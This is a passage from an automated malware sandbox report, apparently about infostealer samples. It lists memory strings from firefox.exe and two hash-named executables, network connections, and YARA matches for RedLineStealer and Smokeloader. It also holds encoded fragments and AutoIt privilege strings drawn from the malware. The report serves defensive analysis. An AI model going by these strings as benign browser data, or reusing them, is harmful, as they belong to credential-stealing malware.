Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/mathml-core/#the-mathvariant-attribute
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/schemas/notifications
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://a581a2f1-688c-434b-8db8-16166b199
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.certificate-transparency.org/what-is-ct
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchpictureinpicture
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchwikipedia
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000023.00000002.3306154976.000002862E86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000023.00000003.2911410230.000002863BF68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/J
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgL4
Source: firefox.exe, 00000018.00000002.2623557649.00000096528BB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2629600629.00000238F2FB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3350268483.000002863270E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/getActiveAddons/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/toolkit/about/aboutPlugins.ftlhttps://www.openh264.org/operationsRequiringR
Source: firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000023.00000002.3353317296.00000286329B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account7
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account=
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2817649774.0000025C6DB00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000018.00000002.2624675381.00000238E7390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountH
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountI
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8F6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORT
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountQ
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountbrowser-delayed-startup-finishedauthorStyleDisabledDefaultresetLocati
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentsupgrade
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountt
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounttoolkit.singletonWindowType_downloadTypesViewableInternally_shouldVie
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountw
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000023.00000002.3357057608.0000028632C41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3297087442.000002862E582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49568
Source: unknown Network traffic detected: HTTP traffic on port 49567 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49567
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49554
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49565
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49553
Source: unknown Network traffic detected: HTTP traffic on port 49563 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49563
Source: unknown Network traffic detected: HTTP traffic on port 49568 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49562 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49562
Source: unknown Network traffic detected: HTTP traffic on port 49565 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49550
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49561
Source: unknown Network traffic detected: HTTP traffic on port 49564 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49561 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49553 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49558 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49550 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49558
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49564 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49565 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49568 version: TLS 1.2
Source: 1c593ec106.exe, 00000009.00000002.2939170613.00000000021CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES memstr_ce4959c1-9
Source: Yara match File source: Process Memory Space: 1c593ec106.exe PID: 8168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1c593ec106.exe PID: 6824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1c593ec106.exe PID: 3960, type: MEMORYSTR

System Summary

Source: 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2743508597.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.2783023147.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2741099564.00000000024AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.2722138020.00000000040D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9374cf64-b
Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0f8a039e-2
Source: 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_267b08d5-7
Source: 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c9dee059-b
Source: 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3021083a-f
Source: 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTa